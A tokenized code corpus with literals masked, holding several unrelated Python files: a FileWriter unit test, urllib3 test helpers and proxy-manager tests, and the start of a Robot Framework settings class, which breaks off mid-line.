<s> import sys <EOL> import unittest <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> from composer . index import Index <EOL> from composer . writer import FileWriter <EOL> class DummyFileWriter ( FileWriter ) : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> self . reset ( ) <EOL> super ( DummyFileWriter , self ) . __init__ ( * args , ** kw ) <EOL> def reset ( self ) : <EOL> self . _made_dirs = [ ] <EOL> self . _written_files = [ ] <EOL> def _prepare_dir ( self , path ) : <EOL> if path not in self . _made_dirs : <EOL> self . _made_dirs . append ( path ) <EOL> def _write_file ( self , path , content ) : <EOL> self . _written_files . append ( path ) <EOL> class TestWriter ( unittest . TestCase ) : <EOL> def test_file_materialize_path ( self ) : <EOL> w = DummyFileWriter ( Index ( ) ) <EOL> self . assertEqual ( w . _made_dirs , [ '<STR_LIT>' ] ) <EOL> test_values = [ <EOL> ( '<STR_LIT:/>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ) , <EOL> ] <EOL> for url , made_dirs , written_files in test_values : <EOL> w . reset ( ) <EOL> w . materialize_url ( url , '<STR_LIT>' ) <EOL> self . assertEqual ( w . _made_dirs , made_dirs ) <EOL> self . assertEqual ( w . _written_files , written_files ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import warnings <EOL> import sys <EOL> import errno <EOL> import functools <EOL> import logging <EOL> import socket <EOL> from nose . plugins . skip import SkipTest <EOL> from urllib3 . exceptions import MaxRetryError , HTTPWarning <EOL> from urllib3 . packages import six <EOL> TARPIT_HOST = '<STR_LIT>' <EOL> VALID_SOURCE_ADDRESSES = [ ( ( '<STR_LIT>' , <NUM_LIT:0> ) , True ) , ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) , False ) ] <EOL> INVALID_SOURCE_ADDRESSES = [ ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , <NUM_LIT:0> ) ] <EOL> def clear_warnings ( cls = HTTPWarning ) : <EOL> new_filters = [ ] <EOL> for f in warnings . filters : <EOL> if issubclass ( f [ <NUM_LIT:2> ] , cls ) : <EOL> continue <EOL> new_filters . append ( f ) <EOL> warnings . filters [ : ] = new_filters <EOL> def setUp ( ) : <EOL> clear_warnings ( ) <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' , HTTPWarning ) <EOL> def onlyPy26OrOlder ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy27OrNewer ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy279OrNewer ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if sys . 
version_info < ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:9> ) : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy2 ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if six . PY3 : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy3 ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if not six . PY3 : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def requires_network ( test ) : <EOL> """<STR_LIT>""" <EOL> def _is_unreachable_err ( err ) : <EOL> return getattr ( err , '<STR_LIT>' , None ) in ( errno . ENETUNREACH , <EOL> errno . EHOSTUNREACH ) <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( <EOL> name = test . __name__ ) <EOL> try : <EOL> return test ( * args , ** kwargs ) <EOL> except socket . error as e : <EOL> if _is_unreachable_err ( e ) : <EOL> raise SkipTest ( msg ) <EOL> raise <EOL> except MaxRetryError as e : <EOL> if _is_unreachable_err ( e . reason ) : <EOL> raise SkipTest ( msg ) <EOL> raise <EOL> return wrapper <EOL> class _ListHandler ( logging . Handler ) : <EOL> def __init__ ( self ) : <EOL> super ( _ListHandler , self ) . __init__ ( ) <EOL> self . records = [ ] <EOL> def emit ( self , record ) : <EOL> self . records . append ( record ) <EOL> class LogRecorder ( object ) : <EOL> def __init__ ( self , target = logging . root ) : <EOL> super ( LogRecorder , self ) . __init__ ( ) <EOL> self . _target = target <EOL> self . _handler = _ListHandler ( ) <EOL> @ property <EOL> def records ( self ) : <EOL> return self . _handler . records <EOL> def install ( self ) : <EOL> self . _target . 
addHandler ( self . _handler ) <EOL> def uninstall ( self ) : <EOL> self . _target . removeHandler ( self . _handler ) <EOL> def __enter__ ( self ) : <EOL> self . install ( ) <EOL> return self . records <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . uninstall ( ) <EOL> return False </s>
<s> import json <EOL> import socket <EOL> import unittest <EOL> from nose . tools import timed <EOL> from dummyserver . testcase import HTTPDummyProxyTestCase , IPv6HTTPDummyProxyTestCase <EOL> from dummyserver . server import ( <EOL> DEFAULT_CA , DEFAULT_CA_BAD , get_unreachable_address ) <EOL> from . . import TARPIT_HOST <EOL> from urllib3 . _collections import HTTPHeaderDict <EOL> from urllib3 . poolmanager import proxy_from_url , ProxyManager <EOL> from urllib3 . exceptions import ( <EOL> MaxRetryError , SSLError , ProxyError , ConnectTimeoutError ) <EOL> from urllib3 . connectionpool import connection_from_url , VerifiedHTTPSConnection <EOL> class TestHTTPProxyManager ( HTTPDummyProxyTestCase ) : <EOL> def setUp ( self ) : <EOL> self . http_url = '<STR_LIT>' % ( self . http_host , self . http_port ) <EOL> self . http_url_alt = '<STR_LIT>' % ( self . http_host_alt , <EOL> self . http_port ) <EOL> self . https_url = '<STR_LIT>' % ( self . https_host , self . https_port ) <EOL> self . https_url_alt = '<STR_LIT>' % ( self . https_host_alt , <EOL> self . https_port ) <EOL> self . proxy_url = '<STR_LIT>' % ( self . proxy_host , self . proxy_port ) <EOL> def test_basic_proxy ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> def test_nagle_proxy ( self ) : <EOL> """<STR_LIT>""" <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> hc2 = http . connection_from_host ( self . http_host , self . http_port ) <EOL> conn = hc2 . _get_conn ( ) <EOL> hc2 . _make_request ( conn , '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> tcp_nodelay_setting = conn . sock . getsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY ) <EOL> self . 
assertEqual ( tcp_nodelay_setting , <NUM_LIT:0> , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" % tcp_nodelay_setting ) ) <EOL> def test_proxy_conn_fail ( self ) : <EOL> host , port = get_unreachable_address ( ) <EOL> http = proxy_from_url ( '<STR_LIT>' % ( host , port ) , retries = <NUM_LIT:1> , timeout = <NUM_LIT> ) <EOL> self . assertRaises ( MaxRetryError , http . request , '<STR_LIT:GET>' , <EOL> '<STR_LIT>' % self . https_url ) <EOL> self . assertRaises ( MaxRetryError , http . request , '<STR_LIT:GET>' , <EOL> '<STR_LIT>' % self . http_url ) <EOL> try : <EOL> http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError as e : <EOL> self . assertEqual ( type ( e . reason ) , ProxyError ) <EOL> def test_oldapi ( self ) : <EOL> http = ProxyManager ( connection_from_url ( self . proxy_url ) ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> def test_proxy_verified ( self ) : <EOL> http = proxy_from_url ( self . proxy_url , cert_reqs = '<STR_LIT>' , <EOL> ca_certs = DEFAULT_CA_BAD ) <EOL> https_pool = http . _new_pool ( '<STR_LIT>' , self . https_host , <EOL> self . https_port ) <EOL> try : <EOL> https_pool . request ( '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except SSLError as e : <EOL> self . assertTrue ( '<STR_LIT>' in str ( e ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % e ) <EOL> http = proxy_from_url ( self . proxy_url , cert_reqs = '<STR_LIT>' , <EOL> ca_certs = DEFAULT_CA ) <EOL> https_pool = http . _new_pool ( '<STR_LIT>' , self . https_host , <EOL> self . https_port ) <EOL> conn = https_pool . _new_conn ( ) <EOL> self . assertEqual ( conn . __class__ , VerifiedHTTPSConnection ) <EOL> https_pool . 
request ( '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> http = proxy_from_url ( self . proxy_url , cert_reqs = '<STR_LIT>' , <EOL> ca_certs = DEFAULT_CA ) <EOL> https_fail_pool = http . _new_pool ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , self . https_port ) <EOL> try : <EOL> https_fail_pool . request ( '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except SSLError as e : <EOL> self . assertTrue ( "<STR_LIT>" in str ( e ) ) <EOL> def test_redirect ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . http_url } , <EOL> redirect = False ) <EOL> self . assertEqual ( r . status , <NUM_LIT> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . http_url } ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . data , b'<STR_LIT>' ) <EOL> def test_cross_host_redirect ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> cross_host_location = '<STR_LIT>' % self . http_url_alt <EOL> try : <EOL> http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : cross_host_location } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:0> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError : <EOL> pass <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . http_url_alt } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:1> ) <EOL> self . assertNotEqual ( r . _pool . host , self . http_host_alt ) <EOL> def test_cross_protocol_redirect ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> cross_protocol_location = '<STR_LIT>' % self . https_url <EOL> try : <EOL> http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . 
http_url , <EOL> fields = { '<STR_LIT:target>' : cross_protocol_location } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:0> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError : <EOL> pass <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . https_url } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:1> ) <EOL> self . assertEqual ( r . _pool . host , self . https_host ) <EOL> def test_headers ( self ) : <EOL> http = proxy_from_url ( self . proxy_url , headers = { '<STR_LIT>' : '<STR_LIT:bar>' } , <EOL> proxy_headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url_alt ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host_alt , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host , self . 
https_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url_alt ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host_alt , self . https_port ) ) <EOL> r = http . request_encode_body ( '<STR_LIT:POST>' , '<STR_LIT>' % self . http_url ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . 
get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host , self . https_port ) ) <EOL> r = http . request_encode_body ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_body ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host , self . https_port ) ) <EOL> def test_headerdict ( self ) : <EOL> default_headers = HTTPHeaderDict ( a = '<STR_LIT:b>' ) <EOL> proxy_headers = HTTPHeaderDict ( ) <EOL> proxy_headers . add ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> http = proxy_from_url ( <EOL> self . proxy_url , <EOL> headers = default_headers , <EOL> proxy_headers = proxy_headers ) <EOL> request_headers = HTTPHeaderDict ( baz = '<STR_LIT>' ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , headers = request_headers ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . 
get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_proxy_pooling ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . http_url ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:1> ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . http_url_alt ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:1> ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . https_url ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:2> ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . https_url_alt ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:3> ) <EOL> def test_proxy_pooling_ext ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> hc1 = http . connection_from_url ( self . http_url ) <EOL> hc2 = http . connection_from_host ( self . http_host , self . http_port ) <EOL> hc3 = http . connection_from_url ( self . http_url_alt ) <EOL> hc4 = http . connection_from_host ( self . http_host_alt , self . http_port ) <EOL> self . assertEqual ( hc1 , hc2 ) <EOL> self . assertEqual ( hc2 , hc3 ) <EOL> self . assertEqual ( hc3 , hc4 ) <EOL> sc1 = http . connection_from_url ( self . https_url ) <EOL> sc2 = http . connection_from_host ( self . https_host , <EOL> self . https_port , scheme = '<STR_LIT>' ) <EOL> sc3 = http . connection_from_url ( self . https_url_alt ) <EOL> sc4 = http . connection_from_host ( self . https_host_alt , <EOL> self . https_port , scheme = '<STR_LIT>' ) <EOL> self . assertEqual ( sc1 , sc2 ) <EOL> self . assertNotEqual ( sc2 , sc3 ) <EOL> self . assertEqual ( sc3 , sc4 ) <EOL> @ timed ( <NUM_LIT:0.5> ) <EOL> def test_https_proxy_timeout ( self ) : <EOL> https = proxy_from_url ( '<STR_LIT>' . format ( host = TARPIT_HOST ) ) <EOL> try : <EOL> https . request ( '<STR_LIT:GET>' , self . 
http_url , timeout = <NUM_LIT> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError as e : <EOL> self . assertEqual ( type ( e . reason ) , ConnectTimeoutError ) <EOL> @ timed ( <NUM_LIT:0.5> ) <EOL> def test_https_proxy_pool_timeout ( self ) : <EOL> https = proxy_from_url ( '<STR_LIT>' . format ( host = TARPIT_HOST ) , <EOL> timeout = <NUM_LIT> ) <EOL> try : <EOL> https . request ( '<STR_LIT:GET>' , self . http_url ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError as e : <EOL> self . assertEqual ( type ( e . reason ) , ConnectTimeoutError ) <EOL> class TestIPv6HTTPProxyManager ( IPv6HTTPDummyProxyTestCase ) : <EOL> def setUp ( self ) : <EOL> self . http_url = '<STR_LIT>' % ( self . http_host , self . http_port ) <EOL> self . http_url_alt = '<STR_LIT>' % ( self . http_host_alt , <EOL> self . http_port ) <EOL> self . https_url = '<STR_LIT>' % ( self . https_host , self . https_port ) <EOL> self . https_url_alt = '<STR_LIT>' % ( self . https_host_alt , <EOL> self . https_port ) <EOL> self . proxy_url = '<STR_LIT>' % ( self . proxy_host , self . proxy_port ) <EOL> def test_basic_ipv6_proxy ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> from robot import utils <EOL> from robot . errors import DataError , FrameworkError <EOL> from robot . output import LOGGER , loggerhelper <EOL> class _BaseSettings ( object ) : <EOL> _cli_opts = { '<STR_LIT:Name>' : ( '<STR_LIT:name>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:test>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , utils . abspath ( '<STR_LIT:.>' ) ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , - <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) } <EOL> _output_opts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , options = None , log = True ) : <EOL> self . _opts = { } <EOL> self . _cli_opts = self . _cli_opts . copy ( ) <EOL> self . _cli_opts . update ( self . _extra_cli_opts ) <EOL> self . 
_process_cli_opts ( options or { } , log ) <EOL> if log : LOGGER . info ( '<STR_LIT>' % unicode ( self ) ) <EOL> def _process_cli_opts ( self , opts , log ) : <EOL> for name , ( cli_name , default ) in self . _cli_opts . items ( ) : <EOL> value = opts . get ( cli_name , default ) <EOL> if value in [ None , [ ] ] : <EOL> value = default <EOL> elif default == [ ] and isinstance ( value , basestring ) : <EOL> value = [ value ] <EOL> self [ name ] = self . _process_value ( name , value , log ) <EOL> def __setitem__ ( self , name , value ) : <EOL> if name not in self . _cli_opts : <EOL> raise KeyError ( "<STR_LIT>" % name ) <EOL> self . _opts [ name ] = value <EOL> def _process_value ( self , name , value , log ) : <EOL> if name == '<STR_LIT>' : <EOL> return self . _process_log_level ( value ) <EOL> if value == self . _get_default_value ( name ) : <EOL> return value <EOL> if name in [ '<STR_LIT:Name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if name == '<STR_LIT>' : value = self . _escape ( value ) <EOL> return value . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if name == '<STR_LIT>' : value = [ self . _escape ( v ) for v in value ] <EOL> return [ self . _process_metadata_or_tagdoc ( v ) for v in value ] <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return [ v . replace ( '<STR_LIT>' , '<STR_LIT:&>' ) . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) for v in value ] <EOL> if name in self . _output_opts and utils . eq ( value , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> if name == '<STR_LIT>' : <EOL> return utils . abspath ( value ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _convert_to_positive_integer_or_default ( name , value ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return [ self . _split_args_from_name_or_path ( item ) for item in value ] <EOL> if name == '<STR_LIT>' : <EOL> return self . 
_process_report_background ( value ) <EOL> if name == '<STR_LIT>' : <EOL> return [ self . _process_tag_stat_combine ( v ) for v in value ] <EOL> if name == '<STR_LIT>' : <EOL> return [ v for v in [ self . _process_tag_stat_link ( v ) for v in value ] if v ] <EOL> if name == '<STR_LIT>' : <EOL> return [ v . upper ( ) for v in value ] <EOL> return value <EOL> def _process_log_level ( self , level ) : <EOL> level , visible_level = self . _split_log_level ( level . upper ( ) ) <EOL> self . _opts [ '<STR_LIT>' ] = visible_level <EOL> return level <EOL> def _split_log_level ( self , level ) : <EOL> if '<STR_LIT::>' in level : <EOL> level , visible_level = level . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> else : <EOL> visible_level = level <EOL> self . _validate_log_level_and_default ( level , visible_level ) <EOL> return level , visible_level <EOL> def _validate_log_level_and_default ( self , log_level , default ) : <EOL> if log_level not in loggerhelper . LEVELS : <EOL> raise DataError ( "<STR_LIT>" % log_level ) <EOL> if default not in loggerhelper . LEVELS : <EOL> raise DataError ( "<STR_LIT>" % default ) <EOL> if not loggerhelper . IsLogged ( log_level ) ( default ) : <EOL> raise DataError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( default , log_level ) ) <EOL> def __getitem__ ( self , name ) : <EOL> if name not in self . _opts : <EOL> raise KeyError ( "<STR_LIT>" % name ) <EOL> if name in self . _output_opts : <EOL> return self . _get_output_file ( name ) <EOL> return self . _opts [ name ] <EOL> def _get_output_file ( self , type_ ) : <EOL> """<STR_LIT>""" <EOL> name = self . _opts [ type_ ] <EOL> if self . _outputfile_disabled ( type_ , name ) : <EOL> return '<STR_LIT>' <EOL> name = self . _process_output_name ( name , type_ ) <EOL> path = utils . abspath ( os . path . join ( self [ '<STR_LIT>' ] , name ) ) <EOL> self . _create_output_dir ( os . path . 
